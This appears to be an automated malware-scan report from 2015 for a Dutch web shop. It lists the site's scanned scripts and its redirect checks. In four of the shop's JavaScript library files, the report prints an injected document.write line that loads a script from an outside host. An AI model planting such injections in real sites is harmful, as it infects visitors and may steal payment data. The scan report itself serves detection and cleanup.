Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=goldenbrands.nl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.goldenbrands.nl/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 08 Jan 2015 19:35:48 GMT Location: http://goldenbrands.nl/ Server: Apache/2.0.54 (Fedora) Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 | clean |
http://goldenbrands.nl/ | 200 OK Content-Length: 32059 Content-Type: text/html | clean |
http://goldenbrands.nl/js/prototype/prototype.js | 200 OK Content-Length: 163433 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/lib/ccard.js | 200 OK Content-Length: 861 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/prototype/validation.js | 200 OK Content-Length: 37678 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Validator = Class.create(); Validator.prototype = { initialize : function(className, error, test, options) { if(typeof test == 'function'){ this.options = $H(options); this._test = test; } else { this.options = $H(test); this._test = function(){return true}; } this.error = error || 'Validation failed.'; this.className = className; }, test : f 'AE': [new RegExp('^3[47][0-9]{13}$'), new RegExp('^[0-9]{4}$'), true], 'DI': [new RegExp('^6011[0-9]{12}$'), new RegExp('^[0-9]{3}$'), true], 'JCB': [new RegExp('^(3[0-9]{15}|(2131|1800)[0-9]{11})$'), new RegExp('^[0-9]{4}$'), true], 'OT': [false, new RegExp('^([0-9]{3}|[0-9]{4})?$'), false] }); document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://goldenbrands.nl/js/scriptaculous/builder.js | 200 OK Content-Length: 4864 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Builder = { NODEMAP: { AREA: 'map', CAPTION: 'table', COL: 'table', COLGROUP: 'table', LEGEND: 'fieldset', OPTGROUP: 'select', OPTION: 'select', PARAM: 'object', TBODY: 'table', TD: 'table', TFOOT: 'table', TH: 'table', THEAD: 'table', TR: 'table' }, node: function(elementName) { elementName = elementName.toUpperCase(); var parentTag = this "PARAM PRE Q S SAMP SCRIPT SELECT SMALL SPAN STRIKE STRONG STYLE SUB SUP TABLE TBODY TD " "TEXTAREA TFOOT TH THEAD TITLE TR TT U UL VAR").split(/\s /); tags.each( function(tag){ scope[tag] = function() { return Builder.node.apply(Builder, [tag].concat($A(arguments))); }; }); } }; document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') /*/339810*/ Antivirus reports:
| ||
http://goldenbrands.nl/js/scriptaculous/effects.js | 200 OK Content-Length: 38865 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) String.prototype.parseColor = function() { var color = '#'; if (this.slice(0,4) == 'rgb(') { var cols = this.slice(4,this.length-1).split(','); var i=0; do { color = parseInt(cols[i]).toColorPart() } while ( i<3); } else { if (this.slice(0,1) == '#') { if (this.length==4) for(var i=1;i<4;i ) color = (this.charAt(i) this.charAt(i)).toLowerCase(); if (this.length==7) color = this.toLowerCase(); } } return Effect[effect.charAt(0).toUpperCase() effect.substring(1)](element, options); return element; }; } ); $w('getInlineOpacity forceRerendering setContentZoom collectTextNodes collectTextNodesIgnoreClass getStyles').each( function(f) { Effect.Methods[f] = Element[f]; } ); Element.addMethods(Effect.Methods); document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://goldenbrands.nl/js/scriptaculous/dragdrop.js | 200 OK Content-Length: 31312 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/scriptaculous/controls.js | 200 OK Content-Length: 34690 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/scriptaculous/slider.js | 200 OK Content-Length: 10451 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!Control) var Control = { }; Control.Slider = Class.create({ initialize: function(handle, track, options) { var slider = this; if (Object.isArray(handle)) { this.handles = handle.collect( function(e) { return $(e) }); } else { this.handles = [$(handle)]; } this.track = $(track); this.options = options || { }; this.axis = this.options.axis || 'horizontal'; this.increment = this.options.increme finishDrag: function(event, success) { this.active = false; this.dragging = false; this.updateFinished(); }, updateFinished: function() { if (this.initialized && this.options.onChange) this.options.onChange(this.values.length>1 ? this.values : this.value, this); this.event = null; } }); document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://goldenbrands.nl/js/varien/js.js | 200 OK Content-Length: 22233 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/varien/form.js | 200 OK Content-Length: 11833 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/varien/menu.js | 200 OK Content-Length: 4545 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/mage/translate.js | 200 OK Content-Length: 1716 Content-Type: application/x-javascript | clean |
http://goldenbrands.nl/js/mage/cookies.js | 200 OK Content-Length: 2734 Content-Type: application/x-javascript | clean |
http://www.goldenbrands.nl/test404page.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 08 Jan 2015 19:35:54 GMT Location: http://goldenbrands.nl/ Server: Apache/2.0.54 (Fedora) Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 | clean |
http://goldenbrands.nl/test404page.js | 404 Not Found Content-Length: 32340 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: goldenbrands.nl
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 08 Jan 2015 19:35:48 GMT
Pragma: no-cache
Server: Apache/2.0.54 (Fedora)
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: frontend=5723639559eebdd3ab33c997e555b6ae; expires=Thu, 08-Jan-2015 20:35:49 GMT; path=/; domain=goldenbrands.nl; HttpOnly
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: goldenbrands.nl
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 08 Jan 2015 19:35:48 GMT
Pragma: no-cache
Server: Apache/2.0.54 (Fedora)
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: frontend=5723639559eebdd3ab33c997e555b6ae; expires=Thu, 08-Jan-2015 20:35:49 GMT; path=/; domain=goldenbrands.nl; HttpOnly
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: goldenbrands.nl
Referer: http://www.google.com/search?q=goldenbrands.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: goldenbrands.nl
Referer: http://www.google.com/search?q=goldenbrands.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.